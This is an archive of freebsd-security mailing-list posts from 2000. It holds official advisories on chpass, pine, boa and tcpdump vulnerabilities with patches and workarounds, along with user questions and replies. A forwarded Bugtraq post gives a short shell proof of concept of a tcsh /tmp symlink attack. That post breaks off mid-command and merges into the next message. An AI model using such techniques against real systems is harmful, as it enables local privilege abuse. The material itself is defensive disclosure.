MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I receive such message using tcpdump... please help me what does it mean... > 01:57:30.616515 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026 > mydomain.com.domain: 28951+ NS? . (17) [tos 0x60] > 01:57:30.618814 mydomain.com.domain > h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026: 28951 13/0/13 (436) > 01:57:31.274774 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu > mydomain.com: icmp: h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu udp port 1026 unreachable [tos 0x60] > 01:57:33.756127 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026 > mydomain.com.domain: 28951+ NS? . (17) [tos 0x60] > 01:57:33.758429 mydomain.com.domain > h4h.n0w.b3l0ngz.t0.xp. b3cuz.th3.ar3.lamerz.nu.1026: 28951 13/0/13 (436) mydomain is the real name of my domain..... Thank you very much for your help... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 4:50:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 8D05237B4C5 for ; Mon, 30 Oct 2000 04:50:36 -0800 (PST) Received: from idem.sympatico.ca ([64.229.232.147]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001030125035.HJI20301.tomts7-srv.bellnexxia.net@idem.sympatico.ca>; Mon, 30 Oct 2000 07:50:35 -0500 Message-Id: <5.0.0.25.0.20001030074622.009edeb0@pop6.sympatico.ca> X-Sender: b1gbfv75@pop6.sympatico.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Mon, 30 Oct 2000 07:51:33 -0500 To: "Tolpanov, Dmitry" From: =?iso-8859-1?Q?F=E9lix-Antoine?= Paradis Subject: Re: MPPE. Cc: freebsd-security@freebsd.org In-Reply-To: <807044A67EA3D211B11D00A024E91A45F2D218@exch.stack.ru> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org MPPE or PPPoE? However, for MPPE, you can get some informations by going to: http://www.moretonbay.com/vpn/download_pptp.html In the section: FreeBSD3.4 and encryption (it's 3.4 but, it might work) - Felix At 13:23 30/10/00 +0700, you wrote: >Hello. > >I have the FreeBSD 4.1, recently compile and install poptop-1.0.0. Then i >chose pppd for PPP link. Everything is working fine, but I can't make >support for MPPE. As i understand I should upgrade the kernel. >Don't anybody know where i can find info about this or may be there are= some >patches especially for FreeBSD 4.1. > >Thanks. > >Dmitry. > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message F=E9lix-Antoine Paradis --------------------------------------------------------------- Idem Private Network, Administrator. Ozyx Technologies, COO. --------------------------------------------------------------- IRC: reel (irc.dal.net) FAX: 1-413-502-3270 --------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 4:53:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 9D23E37B479 for ; Mon, 30 Oct 2000 04:53:24 -0800 (PST) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA25970; Mon, 30 Oct 2000 09:54:10 -0300 (ART) From: Fernando Schapachnik Message-Id: <200010301254.JAA25970@ns1.via-net-works.net.ar> Subject: Re: Need help!!! In-Reply-To: "from petro at Oct 30, 2000 02:50:47 pm" To: petro Date: Mon, 30 Oct 2000 09:54:10 -0300 (ART) Cc: freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Relax. Seems that somebody is querying your DNS. En un mensaje anterior, petro escribió: > I receive such message using tcpdump... please help me what does it > mean... > > 01:57:30.616515 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026 > > mydomain.com.domain: 28951+ NS? . (17) [tos 0x60] > > 01:57:30.618814 mydomain.com.domain > > h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026: 28951 13/0/13 (436) > > 01:57:31.274774 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu > > mydomain.com: icmp: h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu udp > port 1026 unreachable [tos 0x60] > > 01:57:33.756127 h4h.n0w.b3l0ngz.t0.xp.b3cuz.th3.ar3.lamerz.nu.1026 > > mydomain.com.domain: 28951+ NS? . (17) [tos 0x60] > > 01:57:33.758429 mydomain.com.domain > h4h.n0w.b3l0ngz.t0.xp. > b3cuz.th3.ar3.lamerz.nu.1026: 28951 13/0/13 (436) > > > mydomain is the real name of my domain..... > > Thank you very much for your help... > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 13:28: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 6327E37B4D7 for ; Mon, 30 Oct 2000 13:27:58 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id NAA24057 for ; Mon, 30 Oct 2000 13:27:52 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda24055; Mon Oct 30 13:27:48 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e9ULRmo67366 for ; Mon, 30 Oct 2000 13:27:48 -0800 (PST) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdV67364; Mon Oct 30 13:27:12 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.1/8.9.1) id e9ULRCe24280 for ; Mon, 30 Oct 2000 13:27:12 -0800 (PST) Message-Id: <200010302127.e9ULRCe24280@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdT24276; Mon Oct 30 13:26:42 2000 X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: tcsh: unsafe tempfile in << redirects (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 30 Oct 2000 13:26:41 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Our tcsh appears vulnerable. So is the 44bsd-csh port. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC ------- Forwarded Message [headers removed] Message-ID: <39FBAAF7.D4F258A4@energymech.net> Date: Sun, 29 Oct 2000 04:43:35 +0000 Reply-To: proton Sender: Bugtraq List From: proton Subject: tcsh: unsafe tempfile in << redirects To: BUGTRAQ@SECURITYFOCUS.COM PROBLEM: /tmp# echo 'hello world' > rootfile /tmp# chmod 600 rootfile /tmp# ln -s rootfile sh$$ /tmp# chown -h 666.666 sh$$ /tmp# ls -l rootfile sh$$ - -rw------- 1 root root 12 Oct 29 03:55 rootfile lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile /tmp# cat < To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:58.chpass Reply-To: security-advisories@freebsd.org Message-Id: <20001030231153.B618B37B4CF@hub.freebsd.org> Date: Mon, 30 Oct 2000 15:11:53 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:58 Security Advisory FreeBSD, Inc. Topic: chpass family contains local root vulnerability Category: core Module: chfn/chpass/chsh/ypchfn/ypchpass/ypchsh/passwd Announced: 2000-10-30 Credits: Problem fixed during internal auditing. Vulnerability pointed out by: caddis Affects: FreeBSD 3.x (all releases), FreeBSD 4.0-RELEASE, FreeBSD 4.0-STABLE prior to the correction date Corrected: 2000/07/20 (FreeBSD 4.0-STABLE) 2000/10/04 (FreeBSD 3.5.1-STABLE) FreeBSD only: NO I. Background ch{fn,pass,sh} are utilities for changing user "finger" information, passwords, and login shell, respectively. The yp* variants perform the analogous changes on a NIS account. II. Problem Description A "format string vulnerability" was discovered in code used by the vipw utility during an internal FreeBSD code audit in July 2000. The vipw utility does not run with increased privileges and so it was believed at the time that it did not represent a security vulnerability. However it was not realised that this code is also shared with other utilities -- namely chfn, chpass, chsh, ypchfn, ypchpass, ypchsh and passwd -- which do in fact run setuid root. Therefore, the problem may be exploited by unprivileged local users to gain root access to the local machine. All versions of FreeBSD prior to the correction date including 4.0 and 3.5.1 are vulnerable to this problem, but it was fixed in the 4.x branch prior to the release of FreeBSD 4.1. III. Impact Local users can obtain root privileges on the local machine. IV. Workaround Remove the setuid bit on the following utilities. This has the side-effect that non-root users cannot change their finger information, passwords, or login shells. # chflags noschg /usr/bin/chfn /usr/bin/chpass /usr/bin/chsh # chmod u-s /usr/bin/chfn /usr/bin/chpass /usr/bin/chsh # chflags noschg /usr/bin/ypchfn /usr/bin/ypchpass /usr/bin/ypchsh # chmod u-s /usr/bin/ypchfn /usr/bin/ypchpass /usr/bin/ypchsh # chflags noschg /usr/bin/passwd # chmod u-s /usr/bin/passwd V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1-RELEASE, 4.1.1-RELEASE, 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2) Apply the patch below and recompile the respective files: Either save this advisory to a file, or download the patch and detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:58/vipw.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:58/vipw.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/vipw # patch -p < /path/to/patch_or_advisory # make depend && make all install # cd /usr/src/usr.bin/chpass/ # make depend && make all install # cd /usr/src/usr.bin/passwd/ # make depend && make all install Patch for vulnerable systems: --- pw_util.c 1999/08/28 01:20:31 1.17 +++ pw_util.c 2000/07/12 00:49:40 1.18 @@ -250,7 +250,7 @@ extern int _use_yp; #endif /* YP */ if (err) - warn(name); + warn("%s", name); #ifdef YP if (_use_yp) warnx("NIS information unchanged"); -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOf3/FFUuHi5z0oilAQEAhAQApmUnWU8Se8V6rAsy98jJLBXp11mmCnaB lVPve0SjOEhTjYVOfLEslDIPECP1WNrO3Ep/FiczhoTVrMBzWjh74XIGaiDbRxEy UDWh/cQhAaEmy/KPwraoPas6T2lsJ9brBu5LycKQj/F2SMYCNQOQ3UK4rmXqmf+z jAqmmerfaPo= =YNNN -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:12:54 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 7039437B683; Mon, 30 Oct 2000 15:12:19 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:59.pine Reply-To: security-advisories@freebsd.org Message-Id: <20001030231219.7039437B683@hub.freebsd.org> Date: Mon, 30 Oct 2000 15:12:19 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:59 Security Advisory FreeBSD, Inc. Topic: pine4 port contains remote vulnerability Category: ports Module: pine4/pine4-ssl/zh-pine4/iw-pine4 Announced: 2000-10-30 Affects: Ports collection. Corrected: 2000-10-29 Credits: arkane@SPEAKEASY.ORG Vendor status: Contacted FreeBSD only: NO I. Background Pine is a popular mail user agent. II. Problem Description The pine4 port, versions 4.21 and before, contains a buffer overflow vulnerability which allows a remote user to execute arbitrary code on the local client by the sending of a special-crafted email message. The overflow occurs during the periodic "new mail" checking of an open folder. The pine4 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4000 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. Administrators should note that the Pine software has been a frequent source of past security holes, and makes extensive use of string routines commonly associated with security vulnerabilities. The FreeBSD Security Officer believes it is likely that further vulnerabilities exit in this software, and recommends the use of alternative mail software in environments where electronic mail may be received from untrusted sources. III. Impact Remote users can cause pine4 to crash when closing a mail folder by sending a malformed email. If you have not chosen to install the pine4 port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the pine4 port/package, if you have installed it. The risk can be decreased by not leaving pine sitting idle with an open folder, but it cannot be completely eliminated without patching and recompiling the software. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the pine4 port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-4.21_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/pine-4.21_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/pine-4.21_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/pine-4.21_1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/pine-4.21_1.tgz NOTE: It may be several days before updated packages are available. 3) download a new port skeleton for the listmanager port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOf3+NVUuHi5z0oilAQHjFQQAmVrnuMQbQwPKf8LVdsNFgc6470e8Lz07 +8OTApKVTzX1WVbBNQUTJ8tC0TSiZt/BTOq41EVHc+yP6W8gJWPWmGJHMH2vtd2q /5X1o+Q17IP2doXuDBT2MUJH7simUJBPbZ9Fi+AuI+lecCx80Q9W9qndEypdwpwZ j01EAufwmMk= =nefD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:13:49 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 1BF7B37B4E5; Mon, 30 Oct 2000 15:12:45 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:60.boa Reply-To: security-advisories@freebsd.org Message-Id: <20001030231245.1BF7B37B4E5@hub.freebsd.org> Date: Mon, 30 Oct 2000 15:12:45 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:60 Security Advisory FreeBSD, Inc. Topic: boa web server allows arbitrary file access/execution Category: ports Module: boa Announced: 2000-10-30 Credits: Lluis Mora Affects: Ports collection prior to the correction date. Corrected: 2000-10-07 Vendor status: Updated version released FreeBSD only: NO I. Background Boa is a high-performance web server. II. Problem Description The boa port, versions after 0.92 but prior to 0.94.8.3, contains a vulnerability which allows remote users to view arbitrary files outside the document root. The vulnerability is that boa does not correctly restrict URL-encoded requests containing ".." in the path. In addition, if the administrator has enabled CGI extension support, a request for any file ending in .cgi will result in the file being executed with the privileges of the user id running the web server. Since the .cgi file may reside outside the document root, this may result in untrusted binaries/scripts being executed. If an attacker can upload files to the system, e.g. via anonymous FTP, they can cause arbitrary code to be executed by the user running the web server. The boa port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 4000 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.1.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote users may view any file on the system that is accessible by the webserver account. In addition, the webserver account may be compromised due to the execution of arbitrary files outside the document root. If you have not chosen to install the boa port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the boa port/package, if you you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the boa port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/boa-0.94.8.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/boa-0.94.8.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/boa-0.94.8.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/boa-0.94.8.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/boa-0.94.8.3.tgz 3) download a new port skeleton for the cvsweb port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOf3+LlUuHi5z0oilAQHuAAP+PB/Y6PwDyWZrfvX5cKRdnQiwebU2FPiS BhKSwjwBsE4jZGFw0YC+tU6TksGhun6LvvIw0DVHXRevH0VwPcf18akuqKQrFhPA r3NQ1atFvrdDoGQN0J4px1vANXKPu6afe1LKaMTeF+sbjokoniScnAFyH9IHBvQH mVUcDXhq7sU= =WmZ+ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:14:31 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 7642A37B680; Mon, 30 Oct 2000 15:13:11 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-00:61.tcpdump Reply-To: security-advisories@freebsd.org Message-Id: <20001030231311.7642A37B680@hub.freebsd.org> Date: Mon, 30 Oct 2000 15:13:11 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:61 Security Advisory FreeBSD, Inc. Topic: tcpdump contains remote vulnerabilities Category: core Module: tcpdump Announced: 2000-10-31 Credits: Discovered during internal auditing. Affects: All releases of FreeBSD 3.x, 4.x prior to 4.2 FreeBSD 3.5.1-STABLE and 4.1.1-STABLE prior to the correction date Corrected: 2000-10-04 (FreeBSD 4.1.1-STABLE) 2000-10-05 (FreeBSD 3.5.1-STABLE) Vendor status: Patch released FreeBSD only: NO I. Background tcpdump is a tool for monitoring network activity. II. Problem Description Several overflowable buffers were discovered in the version of tcpdump included in FreeBSD, during internal source code auditing. Some simply allow the remote attacker to crash the local tcpdump process, but there is a more serious vulnerability in the decoding of AFS ACL packets in the more recent version of tcpdump (tcpdump 3.5) included in FreeBSD 4.0-RELEASE, 4.1-RELEASE and 4.1.1-RELEASE, which may allow a remote attacker to execute arbitrary code on the local system (usually root, since root privileges are required to run tcpdump). The former issue may be a problem for systems using tcpdump as a form of intrusion detection system, i.e. to monitor suspicious network activity: after the attacker crashes any listening tcpdump processes their subsequent activities will not be observed. All released versions of FreeBSD prior to the correction date including 3.5.1-RELEASE, 4.0-RELEASE, 4.1-RELEASE and 4.1.1-RELEASE are vulnerable to the "remote crash" problems, and FreeBSD 4.0-RELEASE, 4.1-RELEASE and 4.1.1-RELEASE are also vulnerable to the "remote execution" vulnerability. Both problems were corrected in 4.1.1-STABLE prior to the release of FreeBSD 4.2-RELEASE. III. Impact Remote users can cause the local tcpdump process to crash, and (under FreeBSD 4.0-RELEASE, 4.1-RELEASE, 4.1.1-RELEASE and 4.1.1-STABLE prior to the correction date) may be able to cause arbitrary code to be executed as the user running tcpdump, usually root. IV. Workaround Do not use vulnerable versions of tcpdump in network environments which may contain packets from untrusted sources. V. Solution One of the following: 1) Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE or 3.5.1-STABLE after the respective correction dates. 2a) FreeBSD 3.x systems prior to the correction date Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:61/tcpdump-3.x.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:61/tcpdump-3.x.patch.asc # cd /usr/src/contrib/tcpdump # patch -p < /path/to/patch # cd /usr/src/usr.sbin/tcpdump # make depend && make all install 2b) FreeBSD 4.x systems prior to the correction date Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:61/tcpdump-4.x.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-00:61/tcpdump-4.x.patch.asc # cd /usr/src/contrib/tcpdump # patch -p < /path/to/patch # cd /usr/src/usr.sbin/tcpdump # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOf3+JlUuHi5z0oilAQH8GAP+OwB7XLd4PKszqXvcvr/UE9pPMjXR3L3a wUGrvMbapUABULMYuHux9UtaAuZyma3Lq8tIU4V0mq6jMHAqZ/ILCtmukO/TylOV JCt8fJUMmVFmENne4oY56g09bVhV8uk6dtqz3ZJDgJVno1cxXh1Cgyyse3pamt5f xNY1oVybmHE= =4uj5 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:29:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 2040437B479; Mon, 30 Oct 2000 15:29:20 -0800 (PST) Received: (from root@localhost) by giganda.komkon.org (8.9.3/8.9.3) id SAA26744; Mon, 30 Oct 2000 18:29:19 -0500 (EST) (envelope-from str) Date: Mon, 30 Oct 2000 18:29:19 -0500 (EST) From: Igor Roshchin Message-Id: <200010302329.SAA26744@giganda.komkon.org> To: security-officer@freebsd.org, security@freebsd.org Subject: pine advisory Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-4.21_1.tgz is not present... Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:29:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id EE35837B4C5 for ; Mon, 30 Oct 2000 15:29:24 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9UNVTg15221; Mon, 30 Oct 2000 15:31:29 -0800 (PST) (envelope-from kris) Date: Mon, 30 Oct 2000 15:31:29 -0800 From: Kris Kennaway To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG Subject: Re: tcsh: unsafe tempfile in << redirects (fwd) Message-ID: <20001030153129.A15198@citusc17.usc.edu> References: <200010302127.e9ULRCe24280@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Q68bSM7Ycu6FN28Q" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010302127.e9ULRCe24280@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Mon, Oct 30, 2000 at 01:26:41PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Q68bSM7Ycu6FN28Q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Oct 30, 2000 at 01:26:41PM -0800, Cy Schubert - ITSD Open Systems Group wrote: > Our tcsh appears vulnerable. So is the 44bsd-csh port. Yep, stupid braindead $*&^*# shells... Kris --Q68bSM7Ycu6FN28Q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjn+BNEACgkQWry0BWjoQKW1SgCgz4By//sJRekH1EkqftDHgjKO EOgAoLcHm3myVNUzGDhYA0f9FtzipQu7 =oh/7 -----END PGP SIGNATURE----- --Q68bSM7Ycu6FN28Q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 30 15:58: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 0B40C37B4CF for ; Mon, 30 Oct 2000 15:57:56 -0800 (PST) Received: by static.unixfreak.org (Postfix, from userid 1000) id CB3A21F27; Mon, 30 Oct 2000 15:57:55 -0800 (PST) Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:58.chpass In-Reply-To: <20001030231153.B618B37B4CF@hub.freebsd.org> "from FreeBSD Security Advisories at Oct 30, 2000 03:11:53 pm" To: freebsd-security@freebsd.org Date: Mon, 30 Oct 2000 15:57:55 -0800 (PST) From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Message-Id: <20001030235755.CB3A21F27@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ PGP not available, raw data follows ] > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-00:58 Security Advisory > FreeBSD, Inc. > > Topic: chpass family contains local root vulnerability > > Category: core > Module: chfn/chpass/chsh/ypchfn/ypchpass/ypchsh/passwd Forgive my ignorance, but I fail to see how 'passwd' is vulnerable. Yes, it does link with the affected file (pw_util.c), and calls the affected function (pw_error()), but, as far as I can tell, it never calls it with any parameters which can be controlled by the user. I did a 'grep -r' in src/usr.bin and src/usr.sbin for 'pw_error', and I found that there is a limited set of parameters for the first argument. They are: NULL, tempname, _PATH_MASTERPASSWD, passfile, _PATH_PWD_MKDB, editor, and masterpasswd. It looks like only parameter here which can be controlled by the user is 'editor', and 'passwd' never invokes an editor, so it never has to print an error complaining that it can't do it! If I have overlooked something, I apologize for wasting everybody's time, but please let me know. Thanks in advance -- Dima Dorfman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of 